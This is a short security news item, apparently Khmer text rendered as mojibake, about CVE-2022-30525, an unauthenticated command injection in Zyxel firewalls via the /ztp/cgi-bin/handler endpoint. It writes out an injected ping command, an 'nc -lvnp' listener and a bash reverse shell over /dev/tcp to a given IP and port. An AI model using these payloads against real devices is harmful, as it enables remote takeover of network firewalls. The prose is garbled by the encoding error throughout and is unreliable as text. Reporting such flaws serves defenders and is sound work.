แž—แžถแž–แž„แžถแž™แžšแž„แž‚แŸ’แžšแŸ„แŸ‡แž“แŸ…แž€แŸ’แž“แžปแž„แž‡แž‰แŸ’แž‡แžถแŸ†แž„แž—แŸ’แž›แžพแž„ Zyxel แžŠแŸ‚แž›แžขแž“แžปแž‰แŸ’แž‰แžถแžแžฑแŸ’แž™แžŠแŸ†แžŽแžพแžšแž€แžถแžšแž€แžผแžŠแžŠแŸ„แž™แž‚แŸ’แž˜แžถแž“แž€แžถแžšแž•แŸ’แž‘แŸ€แž„แž•แŸ’แž‘แžถแžแŸ‹

แž—แžถแž–แž„แžถแž™แžšแž„แž‚แŸ’แžšแŸ„แŸ‡แžŸแŸ†แžแžถแž“แŸ‹ (CVE-2022-30525) แžแŸ’แžšแžผแžœแž”แžถแž“แž€แŸ†แžŽแžแŸ‹แžขแžแŸ’แžแžŸแž‰แŸ’แž‰แžถแžŽแž“แŸ…แž€แŸ’แž“แžปแž„แžงแž”แž€แžšแžŽแŸ Zyxel แž“แŸƒแžŸแŸŠแŸแžšแžธ ATP, VPN แž“แžทแž„ USG FLEX แžŠแŸ‚แž›แžแŸ’แžšแžผแžœแž”แžถแž“แžšแž…แž“แžถแžกแžพแž„แžŠแžพแž˜แŸ’แž”แžธแžšแŸ€แž”แž…แŸ†แž”แŸ’แžšแžแžทแž”แžแŸ’แžแžทแž€แžถแžšแž“แŸƒแž‡แž‰แŸ’แž‡แžถแŸ†แž„แž—แŸ’แž›แžพแž„ IDS แž“แžทแž„ VPN แž“แŸ…แž€แŸ’แž“แžปแž„แžŸแž แž‚แŸ’แžšแžถแžŸ แžŠแŸ‚แž›แžขแž“แžปแž‰แŸ’แž‰แžถแžแžฑแŸ’แž™แžขแŸ’แž“แž€แžœแžถแž™แž”แŸ’แžšแž แžถแžšแžแžถแž„แž€แŸ’แžšแŸ…แžขแžถแž…แž”แŸ’แžšแžแžทแž”แžแŸ’แžแžทแž€แžผแžŠแž“แŸ…แž›แžพ แžงแž”แž€แžšแžŽแŸแžŠแŸ„แž™แž‚แŸ’แž˜แžถแž“แžŸแžทแž‘แŸ’แž’แžทแžขแŸ’แž“แž€แž”แŸ’แžšแžพแž”แŸ’แžšแžถแžŸแŸ‹แžŠแŸ„แž™แž‚แŸ’แž˜แžถแž“แž€แžถแžšแž•แŸ’แž‘แŸ€แž„แž•แŸ’แž‘แžถแžแŸ‹แŸ” แžŠแžพแž˜แŸ’แž”แžธแžขแž“แžปแžœแžแŸ’แžแž€แžถแžšแžœแžถแž™แž”แŸ’แžšแž แžถแžš แžขแŸ’แž“แž€แžœแžถแž™แž”แŸ’แžšแž แžถแžšแžแŸ’แžšแžผแžœแžแŸ‚แžขแžถแž…แž•แŸ’แž‰แžพแžŸแŸ†แžŽแžพแž‘แŸ…แž€แžถแž“แŸ‹แžงแž”แž€แžšแžŽแŸแžŠแŸ„แž™แž”แŸ’แžšแžพแž–แžทแž’แžธแž€แžถแžš HTTP/HTTPS แŸ” Zyxel แž”แžถแž“แž‡แžฝแžŸแž‡แžปแž›แž—แžถแž–แž„แžถแž™แžšแž„แž‚แŸ’แžšแŸ„แŸ‡แž“แŸ…แž€แŸ’แž“แžปแž„แž€แžถแžšแžขแžถแž”แŸ‹แžŠแŸแžแž€แž˜แŸ’แž˜แžœแžทแž’แžธแž”แž„แŸ’แž€แž”แŸ‹ ZLD 5.30 แŸ” แž™แŸ„แž„แžแžถแž˜แžŸแŸแžœแžถ Shodan แž”แž…แŸ’แž…แžปแž”แŸ’แž”แž“แŸ’แž“แž˜แžถแž“แžงแž”แž€แžšแžŽแŸแž„แžถแž™แžšแž„แž‚แŸ’แžšแŸ„แŸ‡แž…แŸ†แž“แžฝแž“ 16213 แž“แŸ…แž›แžพแž”แžŽแŸ’แžแžถแž‰แžŸแž€แž›แžŠแŸ‚แž›แž‘แž‘แžฝแž›แž™แž€แžŸแŸ†แžŽแžพแžแžถแž˜แžšแž™แŸˆ HTTP/HTTPS แŸ”

แž”แŸ’แžšแžแžทแž”แžแŸ’แžแžทแž€แžถแžšแžแŸ’แžšแžผแžœแž”แžถแž“แžขแž“แžปแžœแžแŸ’แžแžŠแŸ„แž™แž€แžถแžšแž•แŸ’แž‰แžพแž–แžถแž€แŸ’แž™แž”แž‰แŸ’แž‡แžถแžŠแŸ‚แž›แž”แžถแž“แžšแž…แž“แžถแžกแžพแž„แž‡แžถแž–แžทแžŸแŸแžŸแž‘แŸ…แž€แžถแž“แŸ‹แž€แž˜แŸ’แž˜แžœแžทแž’แžธแž‚แŸ’แžšแž”แŸ‹แž‚แŸ’แžšแž„แž‚แŸแž แž‘แŸ†แž–แŸแžš /ztp/cgi-bin/handler แžŠแŸ‚แž›แžขแžถแž…แž”แŸ’แžšแžพแž”แžถแž“แžŠแŸ„แž™แž˜แžทแž“แž…แžถแŸ†แž”แžถแž…แŸ‹แž˜แžถแž“แž€แžถแžšแž•แŸ’แž‘แŸ€แž„แž•แŸ’แž‘แžถแžแŸ‹แŸ” แž”แž‰แŸ’แž แžถแž‚แžบแž”แžŽแŸ’แžแžถแž›แž˜แž€แž–แžธแž€แžถแžšแžแŸ’แžœแŸ‡แž€แžถแžšแžŸแž˜แŸ’แžขแžถแžแž”แŸ‰แžถแžšแŸ‰แžถแž˜แŸ‰แŸ‚แžแŸ’แžšแžŸแŸ†แžŽแžพแžฑแŸ’แž™แž”แžถแž“แžแŸ’แžšแžนแž˜แžแŸ’แžšแžผแžœแž“แŸ…แž–แŸแž›แž”แŸ’แžšแžแžทแž”แžแŸ’แžแžทแž–แžถแž€แŸ’แž™แž”แž‰แŸ’แž‡แžถแž“แŸ…แž›แžพแž”แŸ’แžšแž–แŸแž“แŸ’แž’แžŠแŸ„แž™แž”แŸ’แžšแžพแž€แžถแžšแž แŸ… os.system แžŠแŸ‚แž›แž”แŸ’แžšแžพแž€แŸ’แž“แžปแž„แž”แžŽแŸ’แžŽแžถแž›แŸแž™ lib_wan_settings.py แž แžพแž™แžแŸ’แžšแžผแžœแž”แžถแž“แž”แŸ’แžšแžแžทแž”แžแŸ’แžแžทแž“แŸ…แž–แŸแž›แžŠแŸ†แžŽแžพแžšแž€แžถแžšแž”แŸ’แžšแžแžทแž”แžแŸ’แžแžทแž€แžถแžš setWanPortSt แŸ”

แžงแž‘แžถแž แžšแžŽแŸ แžขแŸ’แž“แž€แžœแžถแž™แž”แŸ’แžšแž แžถแžšแžขแžถแž…แž†แŸ’แž›แž„แžแŸ’แžŸแŸ‚แžขแž€แŸ’แžŸแžš โ€œ; ping 192.168.1.210;" แžŠแŸ‚แž›แž“แžนแž„แž“แžถแŸ†แž‘แŸ…แžŠแž›แŸ‹แž€แžถแžšแž”แŸ’แžšแžแžทแž”แžแŸ’แžแžทแž–แžถแž€แŸ’แž™แž”แž‰แŸ’แž‡แžถ "ping 192.168.1.210" แž“แŸ…แž›แžพแž”แŸ’แžšแž–แŸแž“แŸ’แž’แŸ” แžŠแžพแž˜แŸ’แž”แžธแž‘แž‘แžฝแž›แž”แžถแž“แž€แžถแžšแž…แžผแž›แž‘แŸ…แž€แžถแž“แŸ‹แžŸแŸ‚แž›แž–แžถแž€แŸ’แž™แž”แž‰แŸ’แž‡แžถ แžขแŸ’แž“แž€แžขแžถแž…แžŠแŸ†แžŽแžพแžšแž€แžถแžš โ€œnc -lvnp 1270โ€ แž“แŸ…แž›แžพแž”แŸ’แžšแž–แŸแž“แŸ’แž’แžšแž”แžŸแŸ‹แžขแŸ’แž“แž€ แž แžพแž™แž”แž“แŸ’แž‘แžถแž”แŸ‹แž˜แž€แž…แžถแž”แŸ‹แž•แŸ’แžแžพแž˜แž€แžถแžšแžแž—แŸ’แž‡แžถแž”แŸ‹แž”แž‰แŸ’แž…แŸ’แžšแžถแžŸแžŠแŸ„แž™แž•แŸ’แž‰แžพแžŸแŸ†แžŽแžพแž‘แŸ…แž€แžถแž“แŸ‹แžงแž”แž€แžšแžŽแŸแžŠแŸ„แž™แž”แŸ’แžšแžพแžŸแž‰แŸ’แž‰แžถ '; bash -c \ยปexec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\ยป;'แŸ”

แž”แŸ’แžšแž—แž–: opennet.ru

แž”แž“แŸ’แžแŸ‚แž˜แž˜แžแžทแž™แŸ„แž”แž›แŸ‹